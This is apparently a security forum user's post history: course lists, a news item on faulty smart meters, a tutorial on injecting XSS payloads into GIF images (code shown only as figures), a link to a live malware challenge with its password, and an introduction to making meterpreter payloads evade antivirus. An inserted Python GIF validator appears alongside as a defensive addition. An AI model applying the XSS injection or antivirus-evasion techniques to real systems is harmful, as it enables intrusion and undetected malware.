Usr6 (Active Members)
Posts: 1337
Days Won: 89

Everything posted by Usr6

  1. @Shikata There is no brute-forcing to be done anywhere; it would help you a lot if you figured out what the eggs' identification numbers represent.
  2. 1. Machine Learning (FREE) - Andrew Ng
     First, and arguably the most popular course on this list, Machine Learning provides a broad introduction to machine learning, data mining, and statistical pattern recognition. Topics include:
     • Supervised learning (parametric/non-parametric algorithms, support vector machines, kernels, neural networks).
     • Unsupervised learning (clustering, dimensionality reduction, recommender systems, deep learning).
     • Best practices in machine learning (bias/variance theory; innovation process in machine learning and AI).
     The course will also draw from numerous case studies and applications, so that you’ll also learn how to apply learning algorithms to building smart robots (perception, control), text understanding (web search, anti-spam), computer vision, medical informatics, audio, database mining, and other areas. The course is 11 weeks long and currently averages a 4.9/5 user rating. It is free to take, but you can pay $79 for a certificate upon course completion.

     2. Machine Learning Foundations: A Case Study Approach (FREE) - Carlos Guestrin, Emily Fox
     In Machine Learning Foundations: A Case Study Approach, you will get hands-on experience with machine learning from a series of practical case-studies. At the end of it you will have studied how to predict house prices based on house-level features, analyze sentiment from user reviews, retrieve documents of interest, recommend products, and search for images. Through hands-on practice with these use cases, you will be able to apply machine learning methods in a wide range of domains. By the end of this course, you will be able to:
     • Identify potential applications of machine learning in practice.
     • Describe the core differences in analyses enabled by regression, classification, and clustering.
     • Select the appropriate machine learning task for a potential application.
     • Apply regression, classification, clustering, retrieval, recommender systems, and deep learning.
     • Represent your data as features to serve as input to machine learning models.
     • Assess the model quality in terms of relevant error metrics for each task.
     • Utilize a dataset to fit a model to analyze new data.
     • Build an end-to-end application that uses machine learning at its core.
     • Implement these techniques in Python.
     The course is 6 weeks long and requires about 5-8 hours of commitment per week. It currently averages a 4.6/5 user rating and is free to take, but you can pay $59 for a certificate upon completion.

     3. Learning From Data (FREE) - Yaser S. Abu-Mostafa
     Learning From Data is an introductory course in machine learning that will cover basic theory, algorithms, and applications. It balances theory and practice, and covers the mathematical as well as the heuristic aspects. The lectures follow each other in a story-like fashion: What is learning? Can a machine learn? How to do it? How to do it well? Take-home lessons. You’ll learn how to:
     • Identify basic theoretical principles, algorithms, and applications of Machine Learning
     • Elaborate on the connections between theory and practice in Machine Learning
     • Master the mathematical and heuristic aspects of Machine Learning and their applications to real world situations
     The course is 10 weeks long and requires about 10 – 20 hours per week of commitment. It is free to take, but you can add a verified certificate of completion for $49.

     4. Statistical Learning (FREE) - Trevor Hastie, Rob Tibshirani
     This is an introductory-level course in supervised learning, with a focus on regression and classification methods. The syllabus includes:
     • Linear and polynomial regression, logistic regression and linear discriminant analysis
     • Cross-validation and the bootstrap, model selection and regularization methods (ridge and lasso)
     • Nonlinear models, splines and generalized additive models
     • Tree-based methods, random forests and boosting; support-vector machines
     Also, some unsupervised learning methods are discussed, like principal components and clustering (k-means and hierarchical). This is not a math-heavy class and all computing is done in R. If you are not familiar with R, that is ok. There are lectures devoted to R, giving tutorials from the ground up, and progressing with more detailed sessions that implement the techniques in each chapter. The class is free to take and you are expected to commit 3 – 5 hours per week to work through the course material. If you complete the course, and achieve a passing grade of 50% on the quizzes. If you get 90% or higher, your statement will be “with distinction”.

     5. Machine Learning: Regression (FREE) - Carlos Guestrin, Emily Fox
     In Machine Learning: Regression, you will explore regularized linear regression models for the task of prediction and feature selection. You will be able to handle very large sets of features and select between models of various complexity. You will also analyze the impact of aspects of your data — such as outliers — on your selected models and predictions. To fit these models, you will implement optimization algorithms that scale to large datasets. By the end of this course, you will be able to:
     • Describe the input and output of a regression model
     • Compare and contrast bias and variance when modeling data
     • Estimate model parameters using optimization algorithms
     • Tune parameters with cross validation
     • Analyze the performance of the model
     • Describe the notion of sparsity and how LASSO leads to sparse solutions
     • Deploy methods to select between models
     • Exploit the model to form predictions
     • Build a regression model to predict prices using a housing dataset
     • Implement these techniques in Python
     The course requires 6 weeks of your time and approximately 5 – 8 hours per week to study the material. Its current user rating averages a 4.8/5. The course is free to take, but you can pay $59 to receive a certificate of completion at the end.

     6. Machine Learning: Classification (FREE) - Carlos Guestrin, Emily Fox
     In Machine Learning: Classification, you will create classifiers that provide state-of-the-art performance on a variety of tasks. You will become familiar with the most successful techniques, which are most widely used in practice, including logistic regression, decision trees and boosting. In addition, you will be able to design and implement the underlying algorithms that can learn these models at scale, using stochastic gradient ascent. You will implement these techniques on real-world, large-scale machine learning tasks. You will also address significant tasks you will face in real-world applications of ML, including handling missing data and measuring precision and recall to evaluate a classifier. This course is hands-on, action-packed, and full of visualizations and illustrations of how these techniques will behave on real data. By the end of this course, you will be able to:
     • Describe the input and output of a classification model
     • Tackle both binary and multiclass classification problems
     • Implement a logistic regression model for large-scale classification
     • Create a non-linear model using decision trees
     • Improve the performance of any model using boosting
     • Scale your methods with stochastic gradient ascent
     • Describe the underlying decision boundaries
     • Build a classification model to predict sentiment in a product review dataset
     • Analyze financial data to predict loan defaults
     • Use techniques for handling missing data
     • Evaluate your models using precision-recall metrics
     • Implement these techniques in Python (or in the language of your choice, though Python is highly recommended)
     The course is 7 weeks long and currently averages a 4.6/5 user rating. While the course materials are provided for free, you will need to pay $59 to earn a course completion certificate.

     7. Machine Learning: Clustering & Retrieval (FREE) - Carlos Guestrin, Emily Fox
     In Machine Learning: Clustering & Retrieval you will examine similarity-based algorithms for retrieval. You will also examine structured representations for describing the documents in the corpus, including clustering and mixed membership models, such as latent Dirichlet allocation (LDA). You will implement expectation maximization (EM) to learn the document clusterings, and see how to scale the methods using MapReduce. By the end of this course, you will be able to:
     • Create a document retrieval system using k-nearest neighbors
     • Identify various similarity metrics for text data
     • Reduce computations in k-nearest neighbor search by using KD-trees
     • Produce approximate nearest neighbors using locality sensitive hashing
     • Compare and contrast supervised and unsupervised learning tasks
     • Cluster documents by topic using k-means
     • Describe how to parallelize k-means using MapReduce
     • Examine probabilistic clustering approaches using mixture models
     • Fit a mixture of Gaussian model using expectation maximization (EM)
     • Perform mixed membership modeling using latent Dirichlet allocation (LDA)
     • Describe the steps of a Gibbs sampler and how to use its output to draw inferences
     • Compare and contrast initialization techniques for non-convex optimization objectives
     • Implement these techniques in Python
     The course is 6 weeks in length and currently averages a 4.9/5 user rating. The course materials are free, but you’ll need to pay $59 if you want a course completion certificate.

     8. Unsupervised Machine Learning Hidden Markov Models in Python ($50) - Justin C
     While the current fad in deep learning is to use recurrent neural networks to model sequences, this course will introduce you to a machine learning algorithm that has been around for several decades now – the Hidden Markov Model. In Unsupervised Machine Learning Hidden Markov Models in Python, you’ll learn to measure the probability distribution of a sequence of random variables. In this course you’ll learn:
     • How to use gradient descent to solve for the optimal parameters of an HMM, as an alternative to the popular expectation-maximization algorithm.
     • How to work with sequences in Theano, a popular library for deep learning
     • How to look at a model of sickness and health, and calculate how to predict how long you’ll stay sick, if you get sick
     • How Markov models can be used to analyze how people interact with your website, and fix problem areas like high bounce rate, which could be affecting your SEO
     • Practical applications of Markov models, including generating images, smartphone autosuggestions, and using HMMs to answer one of the most fundamental questions in biology – how is DNA, the code of life, translated into physical or behavioral attributes of an organism?
     The course is comprised of 35 videos and runs a total time of 4 hours. It currently averages a 4.7/5 user rating. However, the course is not free; it costs $50.

     9. Data Science and Machine Learning with Python – Hands On! ($35) - Frank Kane
     If you’ve got some programming or scripting experience, Data Science and Machine Learning with Python – Hands On! will teach you the techniques used by real data scientists in the tech industry – and prepare you for a move into this hot career path. This comprehensive course includes 68 lectures spanning almost 9 hours of video, and most topics include hands-on Python code examples you can use for reference and for practice. The topics in this course come from an analysis of real requirements in data scientist job listings from the biggest tech employers. It covers the machine learning and data mining techniques real employers are looking for, including:
     • Regression analysis
     • K-Means Clustering
     • Principal Component Analysis
     • Train/Test and cross validation
     • Bayesian Methods
     • Decision Trees and Random Forests
     • Multivariate Regression
     • Multi-Level Models
     • Support Vector Machines
     • Reinforcement Learning
     • Collaborative Filtering
     • K-Nearest Neighbor
     • Bias/Variance Tradeoff
     • Ensemble Learning
     • Term Frequency / Inverse Document Frequency
     • Experimental Design and A/B Tests
     The course costs $35 and currently has an average user rating of 4.6/5.

     10. Machine Learning for Data Science and Analytics (FREE) - Ansaf Salleb-Aouissi, Cliff Stein, David Blei, Itsik Peer, Mihalis Yannakakis, Peter Orbanz
     Machine Learning for Data Science and Analytics is an introduction to machine learning and algorithms. You will develop a basic understanding of the principles of machine learning and derive practical solutions using predictive analytics. You will also examine why algorithms play an essential role in Big Data analysis. In this course, you’ll learn:
     • What machine learning is and how it is related to statistics and data analysis
     • How machine learning uses computer algorithms to search for patterns in data
     • How to use data patterns to make decisions and predictions with real-world examples from healthcare involving genomics and preterm birth
     • How to uncover hidden themes in large collections of documents using topic modeling
     • How to prepare data, deal with missing data and create custom data analysis solutions for different industries
     • Basic and frequently used algorithmic techniques including sorting, searching, greedy algorithms and dynamic programming
     The course is 5 weeks and requires a commitment of 7-10 hours per week. It is free, but you have the option of paying $99 for a verified certificate of completion.

     Source: https://hackerlists.com/beginner-ml-courses/
  3. 1. Introduction to Autonomous Mobile Robots (edX)
     The objective of Introduction to Autonomous Mobile Robots is to provide the basic concepts and algorithms required to develop mobile robots that act autonomously in complex environments. The main emphasis is put on mobile robot locomotion and kinematics, environment perception, probabilistic map based localization and mapping, and motion planning. The lectures and exercises of this course introduce several types of robots such as wheeled robots, legged robots and drones.

     2. Underactuated Robotics (edX)
     Underactuated Robotics is taught by Russ Tedrake, Robin Deits and Twan Koolen. It is comprised of 19 lectures covering algorithms for walking, running, swimming, flying, and manipulation, and the prerequisites for this course include basic linear algebra and differential equations.

     3. Introduction to Robotics (MIT)
     Introduction to Robotics, taught by Harry Asada and John Leonard, provides an overview of robot mechanisms, dynamics, and intelligent controls. Topics include planar and spatial kinematics, and motion planning; mechanism design for manipulators and mobile robots, multi-rigid-body dynamics, 3D graphic simulation; control design, actuators, and sensors; wireless networking, task modeling, human-machine interface, and embedded software.

     4. Control of Mobile Robots (Coursera)
     Control of Mobile Robots, taught by Magnus Egerstedt, is a course that focuses on the application of modern control theory to the problem of making robots move around in safe and effective ways. The structure of this class is somewhat unusual since it involves many moving parts – to do robotics right, one has to go from basic theory all the way to an actual robot moving around in the real world, which is the challenge this course has set out to address.

     5. Robot Mechanics and Control, Part I (edX)
     Robot Mechanics and Control, Part I provides a mathematical introduction to the mechanics and control of robots that can be modeled as kinematic chains. Topics covered include the concept of a robot’s configuration space and degrees of freedom, static grasp analysis, the description of rigid body motions, kinematics of open and closed chains, and the basics of robot control.

     6. Robot Mechanics and Control, Part II (edX)
     Robot Mechanics and Control, Part II covers screw motions and the product of exponentials kinematics formula, inverse kinematics of open chains, velocity kinematics and statics, closed chain kinematics, and basics of robot control.

     7. Autonomous Navigation for Flying Robots (edX)
     Autonomous Navigation for Flying Robots introduces the basic concepts for autonomous navigation for quadrotors. The following topics will be covered: 3D geometry, probabilistic state estimation, visual odometry, SLAM, 3D mapping, linear control. In particular, you will learn how to infer the position of the quadrotor from its sensor readings and how to navigate it along a trajectory.

     8. Artificial Intelligence for Robotics (Udacity)
     Artificial Intelligence for Robotics teaches you how to program all the major systems of a robotic car from the leader of Google and Stanford’s autonomous driving teams. You will learn basic methods in Artificial Intelligence, including: probabilistic inference, planning and search, localization, tracking and control, all with a focus on robotics. Extensive programming examples and assignments will apply these methods in the context of building self-driving cars.

     9. Robotic vision (QUT)
     Robotic vision introduces you to the field of computer vision and the mathematics and algorithms that underpin it. You’ll learn how to interpret images to determine the color, size, shape and position of objects in the scene, and you’ll build an intelligent vision system that can recognize objects of different colors and shapes.

     10. Applied Robot Design for Non-Robot-Designers (Stanford)
     In Applied Robot Design for Non-Robot-Designers you will learn how to design and build the mechanical hardware of robots. The goal is to take people with no mechanical experience and teach them to build professional-quality robots. The course consists of weekly labs and a final project, each of which will entail building an interesting robotic device. For example, students will build a pan-tilt camera turret in the belts lab. Topics will include: electric motors, unusual actuators, sensors, mechanical transmissions, rotary and linear motion, counterbalancing, and standard mechanisms.

     11. Introduction to Robotics (Stanford)
     The purpose of Introduction to Robotics is to introduce you to the basics of modeling, design, planning, and control of robot systems. In essence, the material treated in this course is a brief survey of relevant results from geometry, kinematics, statics, dynamics, and control.

     12. Introduction to Robotics Specialization (University of Pennsylvania)
     The Introduction to Robotics Specialization introduces you to the concepts of robot flight and movement, how robots perceive their environment, and how they adjust their movements to avoid obstacles, navigate difficult terrains and accomplish complex tasks such as construction and disaster recovery. You will be exposed to real world examples of how robots have been applied in disaster situations, how they have made advances in human health care and what their future capabilities will be. The courses build towards a capstone in which you will learn how to program a robot to perform a variety of movements such as flying and grasping objects.

     Source: https://hackerlists.com/online-robotics-courses/
  4. Database Fundamentals
     Type: Video Lessons | Level: Beginner | Price: Free
     Before diving into writing SQL queries, it’s useful to get the 10,000 foot conceptual overview, learn some terminology, and see some examples of relational database tables. Database Fundamentals is a five-part video introduction to core database concepts (by two SQL pros) that explains SQL databases from square one using a mix of lecture content and screencasting. It’s a good place to start for anyone who’s a true beginner or looking to review the fundamental concepts of databases.

     Stanford’s Self Paced SQL Mini Courses
     Type: Video Lessons | Level: Beginner, Intermediate | Price: Free
     Stanford offers several free SQL mini courses with in-video quizzes and interactive programming exercises that are auto-checked. Every course has a discussion forum and references outside readings & resources. The course material draws from Stanford’s undergraduate courses.

     essentialSQL
     Type: Video Lessons, Articles, Community | Level: Any | Price: Free & Paid
     Kris Wenzel, creator of essentialSQL, has created a resource rich site. He recommends that you start with his free video course, or dive into some of his beginner text based lessons listed here. There are many thorough text based lessons on the homepage, as well as a learning community.

     SQL Authority – Video Learning
     Type: Video Lessons | Level: Any, Intermediate | Price: Free
     The owner of SQL Authority, Pinal Dave, is a tech enthusiast and independent consultant who has published 21 courses on Pluralsight and written 11 books on SQL Server. His blog has more articles and videos than you could probably ever get through. Many of the videos are on specific topics that are well beyond beginner level.

     SQL Server Tutorial for Beginners
     Type: Video Lesson | Level: Beginner, Intermediate | Price: Free
     A treasure trove of 135 short videos showing SQL database concepts using Microsoft SQL Server and SQL Server Management Studio. Pragim Technologies has video lessons on many other languages on their YouTube channel as well.

     SQL Server Central – Foreign Keys Part 1 & Part 2
     Type: Video Lessons | Level: Intermediate | Price: Free
     The first big hurdle when learning SQL is understanding the significance of foreign keys and how to use them. These two short videos will give you a background in referential integrity. There are many other videos and resources on SQL Server Central, and although some may look a little dated, the basics of SQL haven’t changed much over the years so they’re still relevant.

     Microsoft Virtual Academy – SQL Server Courses
     Type: Video Lessons | Level: Any | Price: Free
     Designing Solutions for SQL Server and Developing Microsoft SQL Server Databases are two of the courses offered by Microsoft Virtual Academy. The two courses, as well as others at MVA, offer training on how to implement and manage database solutions, migrate to scalable cloud solutions, use powerful reporting, and integrate SQL with SharePoint.

     Source: https://hackerlists.com/learn-sql-online/
  5. Name: Iepurasul_cel_viteaz.jpg
     SHA-1: 473F7236DA2AE45FB56A9DDAAB25B1287762B624
     The brave bunnies:
     1. @pr00f
     2. @Hertz
     3. @sandabot
  6. In this course, you will learn all of the old and modern security systems that have been used and are currently being used. You also learn how to crack each one and understand why certain security systems are weak and why others are strong. We will even go into RSA, AES and ECC, which are the three main modern cryptosystems used today.

     Learn How to Crack the Code!
     • Advanced Encryption Standard
     • Public Key Cryptosystems (ie RSA)
     • Elliptic Curve Cryptography
     • Modern Cryptographic Security
     • Advanced Mathematical Techniques

     Master the Art of Security!
     Security is a very important tool, and the ability to use mathematics to hide information is vital to the world. See how our banks and even the National Security Agency (NSA) keep their data secure. With the knowledge of this course, you can even apply for security jobs at places like the NSA! This is a course that is rarely taught in universities, so take advantage and start today! Most of today's security is based upon RSA and AES, but the NSA is trying to push Elliptic Curve Cryptography since it is more secure than RSA. In this course, we learn all of these cryptosystems and their weaknesses. We give examples of every cipher that we cover. Only a small number of people currently understand these systems, and you can join them. The best part of this course is the fun in breaking the codes. We offer many examples of each cryptosystem and how to break each one. Even as you are reading this, your https:// at the top says that the RSA Algorithm is successfully keeping your information from flooding the internet. You can find out how it all works and the mathematical structures that keep it secure in this course. So what are you waiting for?

     Who is the target audience?
     • Anyone interested in computers and security
     • Anyone who wants to work at the National Security Agency
     • Anyone who understands a little about mathematics
     • Anyone who wants to understand why certain systems are secure

     Download: magnet:?xt=urn:btih:303714e54be3a7d973b7c20b31225366de667026&dn=Cryptography%20And%20Math%20Security%20Crack%20The%20Code
     pass:"www.descargasnsn.com"
     Source: http://certcollection.org/forum/topic/311373-udemy-cryptography-and-math-security-crack-the-code-torrent/
  7. Material
     • Introduction
     • Section 1) Fundamentals
     • Section 2) Malware Techniques
     • Section 3) RE Tools
     • Section 4) Triage Analysis
     • Section 5) Static Analysis
     • Section 6) Dynamic Analysis
     Source: https://securedorg.github.io/RE101/
  8. Udemy - Bug Bounty : Web Hacking
     Description
     In this course you will learn how to hack facebook, google, paypal type of web applications; you will not just learn hacking them, you will even learn how to earn from hacking them, and it's all 100% legal. Earning by hacking legally is known as a bug bounty program. 250+ companies have a bug bounty program; Facebook paid 5 million to hackers, Google paid over $6 million and many others do pay. One earns millions to 100,000$/month, so basically a bug bounty program is where hackers get paid for hacking and disclosing bugs to the parent company. If you want to earn by hacking, this course is for you; this course will help you to get started in a bug bounty program. What the instructor has covered in this course: first tools: Burp Suite, Browser Plugins, lots of software in Kali Linux OS; after that all types of vulnerability: SQL, XSS, CSRF injection and many more; then finally the methodology of doing bug bounty. So that's all in this course; this much is enough to learn to begin with bug bounty. If you want to be one among those ethical hackers, then enroll into my course "Bug Bounty: Web hacking" now!
     https://www.udemy.com/bug-bounty-web-hacking/?couponCode=FREE_TEMP
  9. Introduction

     Cross Site Scripting is one of the most common and powerful vulnerabilities on the Web. The OWASP organization has classified it in the third place in the top ten of the most critical web application vulnerabilities (OWASP Top 10 – 2013: https://www.owasp.org/index.php/Top_10_2013-Top_10 ).

     Figure 1: OWASP TOP 10 – 2013

     The cross-site scripting attack is an attack on web applications which allows a hacker to inject malicious scripts to perform malicious actions. The malicious script is executed on the browser side, which makes this attack very powerful and critical. You can have more information about the attack with some good articles here: http://resources.infosecinstitute.com/deadly-consequences-XSS/ Alternatively, here: http://resources.infosecinstitute.com/cross-site-scripting-XSS/

     In this article, we will discuss how we can use an image to perform XSS attacks, from simple to advanced exploitation.

     Let’s go deeper

     Let’s pretend we want to inject a JS script directly; how can we do it? You have to know that if the webmaster/administrator of a platform permits execution of JS scripts from the same domain. If so, we can exploit that! The target just has to have a WYSIWYG editor that permits writing HTML code and downloading images. This is sufficient for a hacker to create a script and inject it into an image, or create an image with an injected payload. What’s a payload? Simply, it is a script that executes malicious actions. Before going deeper into the exploitation, I advise you to read the articles related to these vulnerabilities that I shared with you at the beginning of the article.

     Now imagine that we can exploit XSS with an image. Can we insert it as a comment on an article? A blog? With a BeEF hook or another exploitation framework? The results would be chaotic.

     Now, how can we do it?

     For the exploitation, you will need this script to inject JavaScript into a gif: http://pastebin.com/6yUbfGX5 and this one is for bmp ones: http://pastebin.com/04y7ee3u

     The two scripts are developed with Python; the most important parts are:

     The part that handles the opening of a valid GIF header in Python with \x2A\x2F (aka */).

     Figure 2: The part of the exploit that handles the creation of a valid GIF Header

     If you open a gif image with a hexadecimal editor, you can see in the metadata GIF89a, which verifies the validity of our exploit.

     Figure 3: Hexadecimal Editor

     You can have more information here: http://giflib.sourceforge.net/whatsinagif/bits_and_bytes.html

     Moreover, the part that handles the injecting of the payload:

     Figure 4: The part of the exploit that handles the injection of the payload

     Finally, the exploitation

     Once you have downloaded the script, type the following command, which permits one to adapt the execution of the script to the Linux environment (the environment used is Kali Linux):

     Figure 5: Adaptation of the script into Unix environment

     Then, let’s inject our test script into the image with the following command (we will do the test with a gif image, so we will use the gif injector script ➔ the first one). This is just a simple payload that will show you a JavaScript alert with the message “Learn XSS with gif,” but in a real scenario, an attacker will try to steal your cookie, inject a hook (like the BeEF one), or redirect you to a malicious site:

     Figure 6: Injection of the XSS payload into the gif image

     The result image will change from [image_name].gif to [image_name]_malw.gif. Now we have injected our script into our image; we can use it as an HTML page with the following script, that is automatically generated:

     Figure 6: HTML Script to execute the image

     The image and script source is the output image. Now let’s copy all the content of the directory, and put it into the /var/www directory, then run the apache2 service:

     Figure 7: Starting APACHE2 service

     Then run the HTML page in your browser and SURPRISE:

     Figure 8: Execution of the injected XSS payload

     We can also exploit with a redirection like this:

     Figure 9: Injection of redirection payload

     We can also do it in C or ASM, not just with Python; you can have more information there: https://github.com/jklmnn/imagejs https://gist.github.com/ajinabraham/f2a057fb1930f94886a3

     We can also use it with BeEF, which gives a hacker a golden door to your browser. You can see a related article on this powerful framework here: http://resources.infosecinstitute.com/beef-part-1/

     How to prevent it

     The prevention of this type of exploitation is very difficult, but you can prevent it with the following points:
     • Always filter user input
     • Use a whitelist for the elements loaded, even if it is from the same domain
     • Use high-level models: MVC, PEAR, Struts…
     • Use a token based system
     Moreover, always remember never to let the user write into HTML anywhere on your platform; it is the most important thing.

     Conclusion

     The XSS vulnerability is one of the most powerful vulnerabilities on the web, so never underestimate it and never forget that it can be exploited not just with a vulnerable URL, but can also be injected into content like images, as we just saw. In the next articles, we will discover how we can exploit XSS in applications and some advanced exploitations. Always remember: never trust user input.

     Source: http://resources.infosecinstitute.com/exploit-xss-image/
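The prevention list above says to whitelist what the platform loads; one concrete upload-side check that follows from the GIF structure the article points to (the GIF89a header, then blocks up to the trailer byte) is to verify that an uploaded file is a structurally complete GIF and that nothing follows its trailer, since a decoder stops at the trailer and anything appended after it never changes the picture. The following Python is an added example, not code from the article, the pastebin scripts, or the forum post; the function names are this example's own, and the sample GIF bytes are a constructed 1x1 image.

```python
"""Structural validation of GIF uploads (added example, not the article's code).

A GIF is a 6-byte signature, a 7-byte logical screen descriptor, an optional
global colour table, a sequence of extension (0x21) and image (0x2C) blocks,
and a trailer byte (0x3B). Walking that grammar lets an upload handler reject
files that are truncated, malformed, or carry extra bytes after the trailer.
"""
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")
TRAILER, EXTENSION, IMAGE_DESCRIPTOR = 0x3B, 0x21, 0x2C


class GifStructureError(ValueError):
    """Raised when the byte stream does not follow the GIF block grammar."""


def _color_table_len(packed_byte):
    # Bit 7 says whether a colour table follows; bits 0-2 give its size as
    # 2^(n+1) entries of 3 bytes each.
    if packed_byte & 0x80:
        return 3 * (1 << ((packed_byte & 0x07) + 1))
    return 0


def _skip_sub_blocks(data, pos):
    # Data sub-blocks are length-prefixed and end with a zero-length block.
    while True:
        if pos >= len(data):
            raise GifStructureError("sub-block chain runs past end of file")
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size


def inspect_gif(data):
    """Walk the GIF structure; return dimensions, bytes after the trailer and findings."""
    findings = []
    if len(data) < 13 or data[:6] not in GIF_SIGNATURES:
        raise GifStructureError("missing GIF87a/GIF89a signature")
    width, height, packed = struct.unpack_from("<HHB", data, 6)
    pos = 13 + _color_table_len(packed)  # skip screen descriptor + global colour table
    if width == 0 or height == 0:
        findings.append("zero-sized logical screen")
    trailer_seen = False
    while pos < len(data) and not trailer_seen:
        introducer = data[pos]
        pos += 1
        if introducer == TRAILER:
            trailer_seen = True
        elif introducer == EXTENSION:
            if pos >= len(data):
                raise GifStructureError("truncated extension block")
            pos += 1  # extension label byte (comment, graphic control, ...)
            pos = _skip_sub_blocks(data, pos)
        elif introducer == IMAGE_DESCRIPTOR:
            if pos + 9 > len(data):
                raise GifStructureError("truncated image descriptor")
            local_packed = data[pos + 8]
            pos += 9 + _color_table_len(local_packed)  # descriptor + local colour table
            pos += 1  # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        else:
            raise GifStructureError(
                "unknown block introducer 0x%02x at offset %d" % (introducer, pos - 1))
    if not trailer_seen:
        raise GifStructureError("no trailer byte (0x3B) found")
    trailing = len(data) - pos
    if trailing:
        findings.append("%d bytes follow the GIF trailer" % trailing)
    return {"width": width, "height": height, "trailing_bytes": trailing, "findings": findings}


def is_acceptable_gif(data):
    """Upload-gate decision: structurally valid GIF with nothing after the trailer."""
    try:
        return not inspect_gif(data)["findings"]
    except GifStructureError:
        return False


# Constructed sample inputs (not files from the article): a 1x1 GIF with a
# two-entry global colour table, the same image with a comment extension
# inserted, and the clean image with arbitrary bytes appended after the trailer.
CLEAN_GIF = (
    b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00"    # signature + logical screen descriptor
    + b"\xff\xff\xff\x00\x00\x00"                   # global colour table (2 entries)
    + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"   # image descriptor, no local table
    + b"\x02\x02\x44\x01\x00"                       # LZW min code size + one data sub-block
    + b"\x3b"                                       # trailer
)
COMMENT_GIF = CLEAN_GIF[:19] + b"\x21\xfe\x05hello\x00" + CLEAN_GIF[19:]
TRAILING_GIF = CLEAN_GIF + b"trailing-data"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_GIF), ("comment", COMMENT_GIF), ("trailing", TRAILING_GIF)):
        print(name, is_acceptable_gif(blob), inspect_gif(blob)["findings"])
```

This check is one layer, not the whole defence: the same upload path should also re-encode images with a real decoder so that only pixel data survives, and serve user-supplied files with `X-Content-Type-Options: nosniff` and a Content Security Policy that does not allow the upload location as a script source, so a file that does pass as an image is never executed as anything else.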
  10. Lab tests carried out by Dutch scientists have shown that some of today's "smart" electrical meters may give out false readings that in some cases can be 582% higher than actual energy consumption. The study involved several tests conducted on nine different brands of "smart" meters, also referred to in the industry as "static energy meters." Researchers also used one electromechanical meter for reference. Using a simple test rig, portrayed above, researchers connected the smart meters to various power-consuming appliances found in regular homes, such as energy saving light bulbs, heaters, LED bulbs, and dimmers.

      Tests lasted for six months
      Experiments went on for six months, with individual tests lasting at least one week, and sometimes several weeks. Researchers tried to reproduce regular household energy consumption patterns and didn't focus on putting the smart meters to stressful conditions. The study was conducted by researchers from the University of Twente and the Amsterdam University of Applied Sciences. As such, the meters were chosen to represent the installed base of energy meters in the Netherlands. Meters used in the tests were manufactured between 2004 and 2014. Test results varied wildly, with some meters reporting errors way above their disclosed range, going from -32% to +582%. Tests with uncommon results were repeated several times and the results were within a few percent of the original.

      Test results matched user complaints
      The results of their study matched numbers posted on an online forum by a disgruntled Dutchman complaining about high energy bills. Overall, five of the nine smart meters gave out readings much higher than the actual amount of power consumed, while two gave lower readings. The greatest inaccuracies were seen when researchers combined dimmers with energy saving light bulbs and LED bulbs. After finishing their lab experiment, researchers dismantled the smart meters to understand the problem. Following their efforts, the three-man research team discovered that smart meters which gave abnormally high readings used a Rogowski coil in their setup, while the smart meters that gave out low readings used Hall effect-based sensors.

      Problems blamed on smart meter designs
      Researchers blamed all the issues on the design of some smart meters, and, ironically, electrical devices with energy-saving features. The latter devices, researchers say, introduced a large amount of noise in electrical current waveforms, which disrupts the smart meter sensors tasked with recording power consumption. "The reason for faulty readings appears to be the current sensor, and the associated circuitry," said researchers. "The experimental results [...] show that static energy meters can be pushed into faulty reading (positive and negative) if sufficiently fast pulsed currents are drawn by the consumer."

      Up to 750,000 faulty smart meters in the Netherlands alone
      Since the research only covered smart meters commonly installed in Dutch homes, researchers say that around 750,000 smart meters deployed around the Netherlands may be giving out false readings. Worldwide, the number of possibly faulty smart meters could be in the millions, especially after some governments, especially in the EU, have pushed for smart meters to replace classic electromechanical (rotating disk) meters. The true impact cannot be assessed, as researchers did not publish the names, makes, and models of the tested smart meters. The research team's work, titled "Static Energy Meter Errors Caused by Conducted Electromagnetic Interference," has been published in the IEEE Electromagnetic Compatibility Magazine.

      Source: https://www.bleepingcomputer.com/news/hardware/millions-of-smart-meters-may-over-inflate-readings-by-up-to-600-percent/
  11. https://www.ossblog.org/master-c-programming-with-open-source-books/
12. This challenge contains real malware. Run it only in isolated virtual machines (virtualbox, vmware, etc.) with no network access.
P.S. Sandbox-type programs are not safe - tested.
Download: h t t p : / / g e . t t / 7 T V l L m i 2
Password: dezarhivez un malware
Challenge made in collaboration with @Gecko
Solved the challenge: @sclipici
13. Syllabus

Section: Preliminary Skills - Prerequisites
Module 1: Introduction
Module 2: Networking
Module 3: Web Applications
Module 4: Penetration Testing

Section: Preliminary Skills - Programming
Module 1: C++
Module 2: Python

Section: Penetration Testing
Module 1: Information Gathering
Module 2: Footprinting & Scanning
Module 3: Vulnerability Assessment
Module 4: Web Attacks
Module 5: System Attacks
Module 6: Network Attacks

Invitation: https://www.elearnsecurity.com/affiliate/redeem?code=RYW-AIK
14. This blog post will explain effective methods for bypassing the static, dynamic and heuristic analysis of up-to-date antivirus products. Some of the methods are already known by the public, but there are a few methods and implementation tricks that are the key for generating FUD (Fully Undetectable) malware. The size of the malware is almost as important as anti-detection; when implementing these methods I will try to keep the size as small as possible. This paper also explains the inner workings of antiviruses and the Windows operating system; the reader should have at least intermediate C/C++ and assembly knowledge and a decent understanding of the PE file structure.

Introduction

Implementing anti-detection techniques should be specific for each malware type. All the methods explained in this paper will also work for all kinds of malware, but this paper mainly focuses on stager meterpreter payloads, because meterpreter is capable of all the things that all other malware does: getting a meterpreter session on a remote machine allows many things like privilege escalation, credential stealing, process migration, registry manipulation and a lot more post exploitation. Meterpreter also has a very active community and is very popular among security researchers.

Terminology

Signature Based Detection: Traditional antivirus software relies heavily upon signatures to identify malware. Substantially, when a malware arrives in the hands of an antivirus firm, it is analysed by malware researchers or by dynamic analysis systems. Then, once it is determined to be a malware, a proper signature of the file is extracted and added to the signatures database of the antivirus software.[1]

Static Program Analysis: Static program analysis is the analysis of computer software that is performed without actually executing programs. In most cases the analysis is performed on some version of the source code, and in the other cases, some form of the object code.[2]

Dynamic Program Analysis: Dynamic program analysis is the analysis of computer software that is performed by executing programs on a real or virtual processor. For dynamic program analysis to be effective, the target program must be executed with sufficient test inputs to produce interesting behavior.[3]

